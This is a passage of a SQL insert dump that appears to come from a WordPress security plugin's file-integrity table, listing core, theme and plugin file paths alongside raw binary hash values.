>2�','ɗU�(���S�t��R��QYq�ex}I\'��P','',0,'?'),('�ζ4�PxM�W��$�}�','wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/radio-image.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nDZ�]&��m��\n[{','�d�Oӛ�MCJ��п��3�\\5��)�\Z','',0,'?'),('���46Eg�i\0Q�9�r�','wp-content/themes/simpleshift/inc/kirki/includes/class-kirki.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$��9�L��8','�쮀ܻ�3OqJ\0��i<���i<��I��','',0,'?'),('��֏�9�ɖ���g�\\','wp-content/themes/catch-flames/inc/panel/images/catch-themes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R��vgz���','�+uR;F2%���v�|��eB]=[�gjC��','',0,'?'),('��Vr^T2���X�O���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�B�	�?�{n��\Z','t�����p1��\ZQU�|O���\Z(0�\"tV[','',0,'?'),('��]j�l�\'��/x5','wp-includes/js/wp-sanitize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:k���E�t6Q��','yΦV�� }ɛq����K>ۈP6��*��C\ns}','',0,'?'),('���W��{�\\,�Yu�','wp-includes/js/jquery/ui/effect-explode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���i!1��	�','s��e=\'���ڜ�N�I�{�U�!�M�E�s','',0,'?'),('��71���}\n��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�2+;�F���нNM��','�w��\"�*��5�U T@��nyȳ�^a�u��\'','',0,'?'),('��{Sp�g*����{vR','wp-content/themes/enigma/css/animations.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z����9��ˊ��V','�\'�g�ˌ,O�mk4�� ޚ?�-�lGT<H�<�','',0,'?'),('�0��U�%�2��^���','wp-content/themes/chronus/template-parts/widgets/magazine-medium-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l�D��jRC�<���','>�,:N\\hC��y�2�Ʋ���oS%DP���','',0,'?'),('��纥�ᠡ0�rg��','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-multicheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v��L��6��r','��2dٓ�qѾQ0X݋b��$�Ƴ5#��z��`','',0,'?'),('��c������L�','wp-content/themes/lovecraft/footer.php',0,'�G��;�$ޑ�#e�1�','�G��;�$ޑ�#e�1�','���T�ɛZ��n�?*<����@u���8{�','',0,'?'),('�,\06�R��Ó��p�','wp-content/themes/simpleshift/inc/kirki/includes/output/property/class-kirki-output-property-background-position.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���S���n7����','�a(��J`!�^񧴈~���]|�\"b�i','',0,'?'),('�,�{�vF��ߝ��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z9գ��#����@�r��','K��uBi!�K�V�\0zW���=U�B 2�','',0,'?'),('�-�g1�\Z%f�]s$~','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/generic.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':X@P�rK\Zh��3=e_','5K�X���gٱ�#$W���p+D����','',0,'?'),('�2X69G3�\Z�+}A�6','wp-content/plugins/wordfence/views/waf/option-whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@7���#{X��q��','J���n�������Pq��/�\Z�n\n��l�V','',0,'?'),('�5����\r��k��','wp-admin/js/color-picker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����zhg\0~���','=k�jY�8�8r�a���hI�:Rի9��i��É','',0,'?'),('�8�������P5aĨ�	','wp-includes/images/smilies/icon_wink.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e?2���i����','�(���V��{�V�Bk����o(`Z��V	6','',0,'?'),('�:�o>wo�G	_rK[e','wp-content/themes/education-hub/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,y`��x��� ��','*��C��T7$E�~��C�1�8�L?CvY�z�&�','',0,'?'),('�IU%e.��\n�����@','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/php/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','㳼G��2mv�`�K��','���r�8���_�	S}�>:5\"S���_','',0,'?'),('�N쌠�/�K-�K{�','wp-content/themes/enigma/js/bootstrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ń�rt�H�S��1','��ڤ�C�p���9���L7<�~��d��l�%','',0,'?'),('�y���\Z�D�r�)܅','wp-content/themes/education-hub/inc/customizer/reset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� YH]�~���bJM�','���zJB�6�]ܜ@t#Ɣ�\r�����k����','',0,'?'),('�����y85���æb�','wp-admin/css/colors/sunrise/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z��t��b傽�','�]�\0�mXٕ���Ç?���L�d�rHyʧ','',0,'?'),('��l�3.	XN�','wp-includes/Requests/Exception/HTTP/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`�\r�o��k3��1�','�I�l�E�K�Ѧ��?Z�0JT�����U�','',0,'?'),('��{�1u�.b}κ0$�','wp-content/plugins/wp-cerber/assets/flags/bi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',|��\\_��27�k��	','v����JȢ�\"DWK�9q	�Q�^F%a�A','',0,'?'),('��0�1�r	~s��k�','wp-content/themes/wp-simple/inc/kirki/assets/images/2cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̯nj��h�\'Y�','���g:�s�\'\\���9S����>,�d[�e&u���','',0,'?'),('��K�q\n|��������','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-multicheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v��L��6��r','��2dٓ�qѾQ0X݋b��$�Ƴ5#��z��`','',0,'?'),('����PQ�E|E}7+','wp-admin/includes/class-wp-filesystem-ftpsockets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�/CO\Z>yCiϼ�2�','�9�{��pZ�I�͖��w[Y��.2�l�7�౵�','',0,'?'),('��c����F#�-���1','wp-content/themes/university-hub/inc/customizer/sanitize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\��\Z��*_7	','c7�c��`���Bn����e��LJ�,��','',0,'?'),('�؁ŵSmHe4[�΂�','wp-content/themes/graphene/images/social/megavideo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�������0Ԅ�','�]�%�f*�jV�\0�$�!6����9�Y$�4','',0,'?'),('��q*��\0ZE���','wp-content/themes/city-store/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y\n�ؾ��܂S� ','H�9� �1�`R�7U�6�/�;��BL%`��]N�','',0,'?'),('��U���$�\\*�1^�S�','wp-includes/js/jquery/ui/effect-clip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��=�����:�	s','��tw�:��o,�u3Mxm���x�H ��gC��','',0,'?'),('����P�J�t��1z','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��wU ��ې6M�\\�8','<����\0�\rIB=\"�P8D�\"�����L~�I[','',0,'?'),('����_�� �\0*�O','wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��u��tu�+]�a','�\n�1�IJ��A��P3����C\0{K7QO��f�','',0,'?'),('��P\Z��/���l%�','wp-includes/js/jquery/jquery.hotkeys.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��hI�QLZA$Un�H�','��T����f�RMS�9º��MDR��R��N�','',0,'?'),('�\0� ��k~��U5T','wp-includes/widgets/class-wp-widget-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;���\r9!�5�P�','Y����7%��Z�Gݠ\Z��ӊr�cI�ϸ','',0,'?'),('�\0��ޏ��5^<��','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/cobalt.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|+|\0�UŊ���','BR�ēI/w�g�	ۜ`�64.�V��Z�����','',0,'?'),('��_�*m֯����','wp-content/themes/brickyard/template-logged-in.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nd�į�-ߔ\\[��J/�','�x���@��J��\'Hl`&������Ue�','',0,'?'),('�2����)Uf��z�','wp-content/themes/university-hub/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�����G��X]vM','�њ�>SM�t�@�O�fx�_{#\nމ(��qh�s�','',0,'?'),('�	J.�\'��Vn{�|�T�','wp-content/plugins/wp-cerber/assets/bgwidget.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PM6ev����3���','��F.�F��3��r5�e�*\rl��������3\r','',0,'?'),('�\n%f[!aE�r�tg�i','wp-includes/images/media/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����u�h����q��','DBU����MiO�b�,���e��=��W�{���','',0,'?'),('�:P�x��z����','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/runmode/runmode-standalone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��TH�ߵ?�<��t�','@%��C�M��7���+�!GJ�z�E�%^<��_','',0,'?'),('��-x{u�\"/�?��','wp-content/themes/graduate/inc/customizer/partial.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r_)�=��ye�2:Nl�','�*^����\\4�Cj�\0����|�HqStKY\\','',0,'?'),('�qa�&��#��F��','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/display/fullscreen.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��LO�c��!��(�g','��ax����Ŵ�)�lL�m�ݵ���B�o*���8�','',0,'?'),('�!�P�������Jr�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/base16-light.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��K\0����n\Z�*�z','#�.*ȩK,�\r�D��<����\\���:�{�-�','',0,'?'),('�&�S짿o�$�0�n','wp-includes/author-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','©ei+`љ�[��>q','kt0���6�;��^@�ê��R Β�6�9r߯','',0,'?'),('�\'P��T]�	�6�~�','wp-content/plugins/akismet/_inc/img/logo-full-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^K��-^��>A�s{�','�%>��:1��W��R����ͩ��Q�i��~�^G','',0,'?'),('�*y�\"�ΧQ���k�','wp-content/themes/monograph/template-parts/content-home-featured-2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ڑTm>{���%','��)�_QG1�Q�����i!&��t�[','',0,'?'),('�1v!�������','wp-content/themes/weblog/acmethemes/hooks/navigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y�e��f���J&�[','���j��*y�~~]p鯀1d/������','',0,'?'),('�A�Eb`\\��K�','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-dashicons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!<�t^I�v����e#','�tM�V_d�B���A��4�D�ڇ��ǒ}��3	(','',0,'?'),('�B�A��8�r$�ɝ\\�','wp-content/themes/edge/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�\\�����g4�>���','��2�M{�t�Gn�e���	�+�1����ؠ','',0,'?'),('�G�|$p֠+(�','wp-admin/js/tags-box.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9W�`��(P�E쐷','�������}�;R)_�J7���*��?���[','',0,'?'),('�H��ɪ\Z퟽4��ͻ','wp-content/plugins/wp-cerber/assets/flags/cl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�Q�a�A�ߜ����',' I���ײ|01aK�ը�r%բ�(ظlR�','',0,'?'),('�Q����ԁ�2�7u�L','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1���3y����1��','	}��N�	<�v���B�S%�s\\���S�','',0,'?'),('�R��B�p��m�Z�;','wp-includes/css/dist/block-editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','݁mz���O���ya*p','��&aX�\n��q�E�D������$3Gt���','',0,'?'),('�^�� ��٤�gՅv�G','wp-content/themes/enigma/core/admin/bootstrap/css/bootstrap-theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���h{�Z�Ҩt���','K@O�4�8f#-�u}��a�6�F���^�3�/w','',0,'?'),('�m��wek5ά-��Aq','wp-content/themes/enigma/images/flicker-pro.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�RJ\n	��#D�&','�-����vI�s6x�C�B0� 6��M�Z�i','',0,'?'),('�w��}W����:k%%','wp-content/themes/catch-flames/template-blog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~H���Jwi�r1ڈ','���|�`�()�za Ţ^o�2�>�#�<��Ԫd�d','',0,'?'),('�y�Hz��\"�\\����','wp-content/plugins/wp-cerber/assets/flags/tl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�/`�3˸:��Ldlj','q\0HP��+���m �l�K��(��H�','',0,'?'),('�z��m\Z�.�벿�\0\Z','wp-content/themes/Kent/FT/options/options.php',0,'��WI�[��j(�]�9�7','��WI�[��j(�]�9�7','��Y���ۋ��������@`^;&X','',0,'?'),('�o�j����y��V','wp-content/plugins/wordfence/lib/menu_tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gԌ�p�P�Ig[=��','�V���!�ޟ��ƚ_z�=�|�yaX�ȏ�','',0,'?'),('��Ca�s�]��n�/��','wp-includes/css/dist/block-library/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����a�,U���ʑ�','��܉�)�\0I]�7h�S��l�(�B\n}kw�a','',0,'?'),('��Ѻ�\"�P5��^U�\Zi','wp-admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J�	Ki\Zb+GZ��B','\r9�cgfĊ�T�v��S(�9IE�$�pH��','',0,'?'),('���8h�YX�O./0�I2','wp-content/themes/advance/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=e�\'<�<�����K5','�#!O���q�$���&�x�ʸ�k3��','',0,'?'),('�����`��jy�g��;','wp-content/themes/graduate/assets/plugins/css/unminified/animate.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�&�.�����|4z','�;B�h(oaї��4��if�c����b�;�2','',0,'?'),('��Qd\"L�TA��FP\'','wp-content/themes/metro-magazine/images/no-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EM%,�	�e�d�o�e','�.�6Nk)y�*���.W�`�i3q`��̿u�<�','',0,'?'),('��m���z4�L��K','wp-admin/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('��Gޚܥeaűb�G8\'','wp-content/themes/wp-simple/inc/kirki/kirki/includes/styles/class-kirki-styles-customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��R���Qb�?�iqT','��J�3l`��y���\Z��ր��\0�=$`(!���}','',0,'?'),('����A�G,��<���','wp-includes/js/jquery/ui/effect-fade.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���*Bz��L��','�j�fD�G��=c�Fs㏽���~�쉹X','',0,'?'),('����:��C��E<','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Әȵ �_8�Q3��','�u3{#\'r=MY,��k��ڎ\0��R�tY��','',0,'?'),('��u\Z8E�@b��;w','wp-content/themes/singularity/template-parts/content-single-download.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Xr7�$L�','b�F�T�����ц��&�%���RB.�P�','',0,'?'),('���x<�k���Kxz','wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/link-icons/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�nȆS�+oI�B6�','�Xyf%�_p�B+��ᚁ\0���\0���','',0,'?'),('�Ď�G�RV�/���N�','wp-content/themes/brickyard/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8ie��\"����$','��g�#f%u��ش�\0]��FAM�>ys�WA	9\"','',0,'?'),('���ɵW>_��u꯹A','wp-content/themes/advance/js/welcome-page.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�Q�.%$�қ��t�','�\\��Lp��{\"�Ν����It-�#�{���|�','',0,'?'),('��M�b�x���ԫ��','wp-content/themes/graphene/admin/options-validator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3\0y,�\'JUY��','���E����`RDzy;e���~D#I��U','',0,'?'),('����n\0D,����;R','wp-content/plugins/wordfence/js/jquery.dataTables.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\\�� �͕�h�','v�Ao;�uD�3$�WB95�_\"��� �','',0,'?'),('��Rc(��K�����','wp-content/themes/hitmag/inc/kirki/includes/class-kirki-explode-background-field.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�P^�O�\'��zf��n','dD@w��C��v��ELgR��_��TF�?DWu','',0,'?'),('��M��PW��z��','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/tinymce.plugin.code.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zk���G2��\n�g�O��','Z���\n����Km���}-��7��z��\"t	k','',0,'?'),('�Lor!Vt�y��4�','wp-content/themes/newsmag/inc/admin/welcome-screen/sections/support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�-�\r���[.R�','z��]�q��\'�y�E�����z���~��','',0,'?'),('�����հ	̋�Ȳ�S','wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�Ƚ� ����\\E','��\\�	����O��JpF�>Q�� �?��lgi���.','',0,'?'),('�S��.n\n1&�B��#,','wp-content/themes/newsmag/assets/vendors/machothemes/machothemes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��cG�E��AŨأ�','Iz�!�ɧ�I�\'�-+�A�\Z��`y����~~�','',0,'?'),('��N��v����ٳ�','wp-content/themes/graduate/tp-education/template-parts/content-team.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�笏��K7H�','7˿K�.h:�-�<���Y���pԋ4*q�x�','',0,'?'),('� �n�$��q��^qf��','wp-includes/images/smilies/icon_lol.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����:ѷ&����(�','�l�1�Hq�.�2�x��󢾉$�Y�\Z8�','',0,'?'),('� �ig�o�j��E�u','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/lint/json-lint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��ѧ���!U<(��','����m\"7х�uq����/��~�������','',0,'?'),('�\'^�D��IG�1��!','wp-includes/ms-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ظ;�#�t��r�/+0','J�c�CBE�䱢?$Gq�u,7��ޚ�A�','',0,'?'),('�*T�u\r�����~�m','wp-admin/css/colors/ocean/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v0O��,�ᤴX�׺�','찐p\\B�lI����`�{i�~����&QO','',0,'?'),('�++o*�9�6�ە(aws','wp-content/themes/singularity/template-parts/headers/top-bar-standard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�d�:99��N�','�4f\r~t�@���=�k<\']��Y��4�3K�9','',0,'?'),('�1l<� t~L�Uw�','wp-includes/class-wp-locale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�P�<�#��\0�\':','�D��n]����AW�EH�O�H�@�hAD}','',0,'?'),('�E-j��1j��\r�E�','wp-includes/registration-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q<۾\Z7�M�v��','Kd���_�MF� X��X�.,\'T\\��6���6','',0,'?'),('�G�\r�lZ�2���,','wp-content/themes/university-hub/template-parts/home/news-and-events.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bE,l�{��ą�x�','���W�4���у2i�>�ճ���h<�,j�','',0,'?'),('�]oM�se��J4�','wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o���h5��\rxܖN','6y\Zu�υ;�	�0�~�rs1J�9��X���J���','',0,'?'),('�c�\r�ذ	���ae�','wp-content/themes/enigma/google-font.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E`\n�Z��1+i�f�6�','��z�j��f�kڑ��uHG�\\!w$��:�','',0,'?'),('�f ��r�p�(��p�$�','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��bD�@p�G+��','*DZ�>�Bg�&Y�Y������4(<�/','',0,'?'),('�g�K�;�qF�VI}�Q�','wp-includes/Requests/Exception/HTTP/416.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�N9�ɪ�a�Dx�','�(��mybV�aI�jWp���(!A����<(�X','',0,'?'),('�hD�\0F/��O�a?','wp-content/themes/graphene/admin/images/template-threecolumnsleft.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|P%H�I���n','6\Z�dx�ɩ�.��mI�3��u\r�o��~�$�>��','',0,'?'),('�ir�u�5������','wp-content/themes/twentytwenty/assets/js/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,`��Ќe�dÉd','���*o��z@\n��g�cR��9%�GY�`(J0','',0,'?'),('�m�����:���','wp-content/themes/wp-simple/inc/kirki/assets/css/customizer.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�Z��B�%�\n��','�xr�t-��,~c�;��\n��j�\0��{j','',0,'?'),('�ܴB�E���%�a6Z','wp-content/themes/advance/inc/admin/img/2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~��J�x4NEB','�Z���tס�NS2\r8����b�]p��\n','',0,'?'),('�������<�x�B�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���xqE̜$�b0^�s','T\0>�t�d��ը&\Z4qɢ���A :�C�C��Q','',0,'?'),('��ΩQtn϶^iҚ�','wp-content/themes/skt-pathway/images/h1_buy_bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�<K\n�>��y','[�{�ƴZ�����ć�\'�E���k�7�','',0,'?'),('��e�-��Rȉ���L:�','wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�Z��O�;�m�#�','�v�̀��O��=��n��u�#�}��զ`�4�W�','',0,'?'),('���8���ՠ�)j,z','wp-content/themes/twentynineteen/sass/site/primary/_posts-and-pages.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HB-���L\'�g�Aq','vɘ(�f]A��?p�AR\Za��Ɓ& A9\r[��2','',0,'?'),('��h�ByNɂ���!','wp-content/themes/exoplanet/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����O��ޡT�}�',';8��.�]˾���:�\\�1�n<�տ��A�s','',0,'?'),('��GL�@V����$��','wp-content/themes/hitmag/inc/kirki/includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�4���l�t;Q','\03c��k���if{��\Z�g��6��kW���','',0,'?'),('�����͚�l�+�','wp-content/themes/enigma/options-reset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ߖS�N[�l���c�','�S�Pe���g�z6�㧑2\')P=�˼��','',0,'?'),('��p?E^�@�\'��PE�','wp-admin/edit-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��L�(�`��#��','W~T+��$��zgbl�ء\'���p3��m�1','',0,'?'),('��`��]��9�Qׇ','wp-content/themes/enigma/css/font-awesome-4.7.0/less/animated.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Sʼ�Y�T��','��5-^��}>͌2\n\0){\n��rѼ���','',0,'?'),('��կ\"{K�������','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/css/less_test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#\n���C�`fCP�','�)ee�<[��\"ۻb1��z��]�u׾�\\','',0,'?'),('��>i�>C�.�|#�q','wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4�k�q¸�f&','<S�H>�x�Ɂ����9�|f2�Qν���mF','',0,'?'),('������U�\\��a�E','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��ͱ��r0��؅=�','?E�%��+�����w�\r�^�֗.$�i�$[W','',0,'?'),('���i��֯1�o�R!','wp-content/plugins/wp-cerber/assets/flags/fm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=KbF�!X�ټh[�(@','/������ˆ�_S��L��`ZI�I(1���','',0,'?'),('��44Ve��K���	�','wp-content/themes/graphene/admin/options-presets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��]�4�*�k�x�f','�+;�mȐ�\" G�1BTkĎ\Z��\'t]�v��h�','',0,'?'),('�B����!��vݡɶ','wp-content/plugins/wordfence/views/onboarding/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zz�#uv��\0���','��}���|IR€�v�J�%-�/\n�V���','',0,'?'),('�n/�0�`\Z`W���','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ވ����RxBB��dK','N�\r��v���r����\r7C�H��G+���','',0,'?'),('�%��`LY��$��','wp-content/themes/hitmag/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�3�-0����Z-','r�oU��`�B!9wΦ\\T`%��ad+,H','',0,'?'),('�+�i�p�ZӶtB','wp-content/themes/twentytwentyone/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��rA�_�ù�_9','�ޔ�<N�6����o8���\r�����$i','',0,'?'),('�;��:Չ5��a��-�','wp-content/themes/advance/images/shadow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u����R�� �)(','3�ſ�јb#�w�R�@�&{��Jd��lĻ','',0,'?'),('�<��(��*A]�O�','wp-admin/css/colors/ocean/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','35\"�e4��9��,<?','n)(�Q�hA`�[��汶<�J��t({��dـ','',0,'?'),('�D��d.P˴{-yo�g','wp-content/plugins/wordfence/views/common/status-warning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�f�uֺg-g\0C�=v','�N<\r�;��d�*��8+)�\ZbO?�0��E���','',0,'?'),('�D�=8��^n+�Г�$[','wp-content/themes/advance/inc/kirki/assets/scss/controls/color.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n����|�C�','JG*��r\0�df� >}�����\\�^��N','',0,'?'),('�F�:�Vaf�I͉@�k','wp-content/themes/auberge/template-parts/content-featured-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��<������}�','���ȷOw-\"�$�Y��jn>�)���u�B','',0,'?'),('�I|�K9�(�{s�X','wp-content/plugins/wordfence/lib/menu_scanner_credentials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}���